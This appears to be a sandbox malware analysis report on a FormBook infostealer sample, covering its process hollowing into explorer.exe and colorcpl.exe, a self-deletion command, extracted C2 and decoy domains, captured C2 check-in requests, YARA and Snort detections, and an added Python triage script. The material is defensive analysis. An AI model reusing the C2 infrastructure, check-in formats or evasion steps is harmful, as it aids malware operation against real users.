

Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name: pago atrasado.exe
Analysis ID: 502137
MD5: f841c72b1c4cadc4c98903ad26a96a16
SHA1: 06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256: eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • pago atrasado.exe (PID: 4308 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
    • pago atrasado.exe (PID: 2840 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 248 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4940 cmdline: /c del 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
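The tree above is the complete FormBook chain as the sandbox reconstructs it: the NSIS-packed sample launches a second copy of itself, the sandbox draws explorer.exe as that copy's child (its injection target, per the process-hollowing and "System process connects to network" signatures), explorer.exe then launches a legitimate SysWOW64 binary, colorcpl.exe, as the final host, and colorcpl.exe removes the original file through cmd.exe. The following is an added example, my own triage rules rather than Joe Sandbox's signature code, that runs over such a tree. The process records are transcribed from the tree and the explorer.exe connections from the "System process connects to network" entries further down; the image path of cmd.exe is an assumption, since the tree shows only its command line and MD5.

```python
"""Triage a sandbox process tree for injection lineage and self-cleanup.

Added example for this report; the rules are this example's own, not Joe
Sandbox's signature logic. PROCESSES and NET_EVENTS are transcribed from the
process tree and the "System process connects to network" entries; the image
path of cmd.exe is an assumption (the tree shows only its command line and MD5).
"""
import re

# (pid, parent pid, image path, command line, MD5) as drawn by the sandbox;
# parent edges include the injection edges the sandbox reconstructs.
PROCESSES = [
    (4308, 0,    r"C:\Users\user\Desktop\pago atrasado.exe", r"'C:\Users\user\Desktop\pago atrasado.exe'", "F841C72B1C4CADC4C98903AD26A96A16"),
    (2840, 4308, r"C:\Users\user\Desktop\pago atrasado.exe", r"'C:\Users\user\Desktop\pago atrasado.exe'", "F841C72B1C4CADC4C98903AD26A96A16"),
    (3472, 2840, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE", "AD5296B280E8F522A8A897C96BAB0E1D"),
    (248,  3472, r"C:\Windows\SysWOW64\colorcpl.exe", r"C:\Windows\SysWOW64\colorcpl.exe", "746F3B5E7652EA0766BA10414D317981"),
    (4940, 248,  r"C:\Windows\SysWOW64\cmd.exe",  # image path assumed, not in the report
     r"/c del 'C:\Users\user\Desktop\pago atrasado.exe'", "F3BDBE3BB6F734E357235F4D5898582D"),
    (5060, 4940, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "EA777DEEA782E8B4D7C7C33BBF8A4496"),
]

# (pid, destination ip, port) for the explorer.exe connections listed in the report.
NET_EVENTS = [
    (3472, "208.91.197.27", 80), (3472, "3.64.163.50", 80), (3472, "46.101.121.244", 80),
    (3472, "74.208.236.134", 80), (3472, "34.102.136.180", 80),
]

USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|documents|appdata)\\", re.I)
WINDOWS_DIR = re.compile(r"^[a-z]:\\windows\\", re.I)
# Accepts both "del 'path'" (sandbox rendering) and 'del "path"'.
DEL_TARGET = re.compile(r"""\bdel\s+['"]?(?P<path>[^'"]+?)['"]?\s*$""", re.I)


def index(procs):
    return {p[0]: {"pid": p[0], "ppid": p[1], "image": p[2], "cmdline": p[3], "md5": p[4]} for p in procs}


def ancestors(by_pid, pid):
    """Parent, grandparent, ... up to the root; guards against pid-reuse loops."""
    chain, seen = [], {pid}
    ppid = by_pid[pid]["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        chain.append(by_pid[ppid])
        ppid = by_pid[ppid]["ppid"]
    return chain


def triage(procs, net_events):
    """Return (kind, pid, detail) findings for the four lineage rules below."""
    by_pid = index(procs)
    findings, tainted = [], set()
    for p in by_pid.values():
        anc = ancestors(by_pid, p["pid"])
        # Rule 1: the sample spawns a second copy of itself (staged unpacking / hollowing).
        if anc and anc[0]["image"].lower() == p["image"].lower() and anc[0]["md5"] == p["md5"]:
            findings.append(("self-respawn", p["pid"], p["image"]))
        # Rule 2: a Windows-directory binary whose lineage leads back to a user-writable executable.
        root = next((a for a in anc if USER_WRITABLE.match(a["image"])), None)
        if root and WINDOWS_DIR.match(p["image"]):
            tainted.add(p["pid"])
            findings.append(("system-binary-under-user-exe", p["pid"], root["image"]))
        # Rule 3: cmd.exe deleting the image of one of its own ancestors.
        m = DEL_TARGET.search(p["cmdline"]) if p["image"].lower().endswith("\\cmd.exe") else None
        if m and any(a["image"].lower() == m.group("path").lower() for a in anc):
            findings.append(("self-deletion", p["pid"], m.group("path")))
    # Rule 4: a tainted system process is the one talking to the network.
    dests = {}
    for pid, ip, port in net_events:
        if pid in tainted:
            dests.setdefault(pid, set()).add("%s:%d" % (ip, port))
    for pid, ips in dests.items():
        findings.append(("injected-process-network", pid, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    for kind, pid, detail in triage(PROCESSES, NET_EVENTS):
        print("%-30s pid=%-5d %s" % (kind, pid, detail))
```

Rule 2 is the one that carries the weight in real telemetry: on a live host explorer.exe's parent is userinit.exe, so the "user executable somewhere above a Windows binary" relation only appears when an EDR records the injection edge (remote thread, APC, mapped section) as the sandbox does here; without that edge, rule 4 has to fall back on "explorer.exe connecting to low-reputation hosts on port 80", which is what the report's own signature did.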

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    (25 further memory-dump entries not shown)

      Unpacked PEs

Source | Rule | Description | Author | Strings
1.1.pago atrasado.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    1.1.pago atrasado.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    1.1.pago atrasado.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    1.2.pago atrasado.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    1.2.pago atrasado.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    (13 further unpacked-PE entries not shown)

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match, file source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: pago atrasado.exe, Joe Sandbox ML: detected
Source: 0.2.pago atrasado.exe.2330000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.colorcpl.exe.4a4796c.4.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 16.2.colorcpl.exe.2b2c88.1.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pago atrasado.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.pago atrasado.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: pago atrasado.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: colorcpl.pdbGCTL, source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: colorcpl.pdb, source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: pago atrasado.exe, colorcpl.exe
Source: C:\Users\user\Desktop\pago atrasado.exe, Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\pago atrasado.exe, Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\pago atrasado.exe, Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\pago atrasado.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 4x nop then pop ebx

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.crisisinterventionadvocates.com
Source: C:\Windows\explorer.exe, Domain query: www.ttemola.com
Source: C:\Windows\explorer.exe, Network Connect: 208.91.197.27 80
Source: C:\Windows\explorer.exe, Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe, Network Connect: 46.101.121.244 80
Source: C:\Windows\explorer.exe, Network Connect: 74.208.236.134 80
Source: C:\Windows\explorer.exe, Domain query: www.baybeg.com
Source: C:\Windows\explorer.exe, Domain query: www.everythangbutwhite.com
Source: C:\Windows\explorer.exe, Domain query: www.highvizpeople.com
Source: C:\Windows\explorer.exe, Domain query: www.itskosi.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe, Domain query: www.oddanimalsink.com
Source: C:\Windows\explorer.exe, Domain query: www.ishhs.xyz
Source: C:\Windows\explorer.exe, Domain query: www.sfcn-dng.com
Source: C:\Windows\explorer.exe, Domain query: www.umgaleloacademy.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.ishhs.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.crisisinterventionadvocates.com/u9xn/
Source: Joe Sandbox View, ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic, HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.highvizpeople.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.oddanimalsink.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.itskosi.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.crisisinterventionadvocates.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.everythangbutwhite.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View, IP Address: 208.91.197.27 208.91.197.27
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Wed, 13 Oct 2021 14:44:25 GMT; Content-Type: text/html; Content-Length: 275; ETag: "615f9601-113"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Content-Length: 626; Connection: close; Date: Wed, 13 Oct 2021 14:44:46 GMT; Server: Apache; Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: pago atrasado.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: pago atrasado.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.Highvizpeople.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.everythangbutwhite.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.everythangbutwhite.com/
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
